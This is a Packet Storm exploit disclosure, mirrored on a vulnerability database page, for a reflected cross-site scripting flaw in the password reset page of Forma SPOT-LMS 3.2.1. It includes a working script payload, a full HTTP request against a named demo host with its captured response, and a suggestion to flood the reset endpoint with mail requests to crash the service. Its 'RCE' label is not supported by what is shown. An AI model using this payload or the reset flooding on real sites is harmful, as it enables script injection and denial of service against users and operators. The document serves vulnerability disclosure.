Lucene search
K

Forma SPOT-LMS 3.2.1 Cross Site Scripting

🗓️ 08 Nov 2022 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 241 Views

Forma SPOT-LMS-3.2.1 Cross-site scripting RCE - reset mail vulnerability in demo accoun

Code
`## Title: Forma SPOT-LMS-3.2.1 Cross-site scripting (reflected) RCE - reset mail vulnerability  
## Author: nu11secur1ty  
## Date: 11.07.2022  
## Vendor: https://www.spotlms.us/index_multi.php  
## The software is applied in the demo account:  
https://www.spotlms-anca-001.ovh/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest  
  
## Description:  
The name of an arbitrarily supplied `URL` parameter from forgetpw.php  
is copied into the value of an HTML tag attribute which is  
encapsulated in double quotation marks.  
The payload qnlxv"><script>alert('hello from  
nu11secur1ty')</script>sad4r was submitted in the name of an  
arbitrarily supplied URL parameter.  
This input was echoed unmodified in the application's response.  
The attacker can use this vulnerability to crash the cloud system by  
sending an unlimited password reset request to mail in an already  
created account on some domain, for example:  
(www.spotlms-anca-001.ovh).  
  
## NOTE:  
For this test `google` reacted on the twentieth request =) and they  
block the requests from my exploit, but after some time the attacker  
can repeat and repeat these steps endlessly :)  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploit:  
  
```POST  
GET /forgetpw.php/qnlxv"><script>function a() { document.write("<img  
src='https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/XSS-image/image/kostaakatil.webp?token=GHSAT0AAAAAABTHSDC76YMVBQKZ7VLVFSBAYTHWGMQ'></img>");  
}; window.onload = a; alert("A Hidden scripted image, warning you are  
vulnerable!");</script>sad4r HTTP/2  
Host: www.spotlms-anca-001.ovh  
Accept-Encoding: gzip, deflate  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63  
Safari/537.36  
Cache-Control: max-age=0  
Cookie: PHPSESSID=7affe3c03b941d681047eea2ed6a5809;  
_ga=GA1.2.688816030.1667823793; _gid=GA1.2.466977147.1667823793;  
_gat=1  
Upgrade-Insecure-Requests: 1  
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"  
Sec-Ch-Ua-Platform: Windows  
Sec-Ch-Ua-Mobile: ?0  
Content-Length: 0  
```  
[+]Responce:  
  
```  
pagespeed.CriticalImages.Run('/mod_pagespeed_beacon','https://www.spotlms-anca-001.ovh/forgetpw.php/qnlxv%22%3E%3Cscript%3Efunction','lJlesnYP1D',true,false,'eZpCFSK_6xQ');  
//]]></script><img class="img-fluid mx-auto d-block" alt="LOGO"  
src="/images/logos/logo-aurorae-v0.png" width="176" height="65"  
data-pagespeed-url-hash="3925108827"  
onload="pagespeed.CriticalImages.checkImageForCriticality(this);"/>  
<center>  
<p class="mt-3">A validation code will be sent to  
your email to authorize the password reset operation</p>  
</center>  
```  
  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/upload/main/vendors/spotlms.us/2022/SPOT-LMS-Latest)  
  
## Proof and Exploit:  
[href](https://streamable.com/y4gz1n)  
  
## Time spent  
`1:45`  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation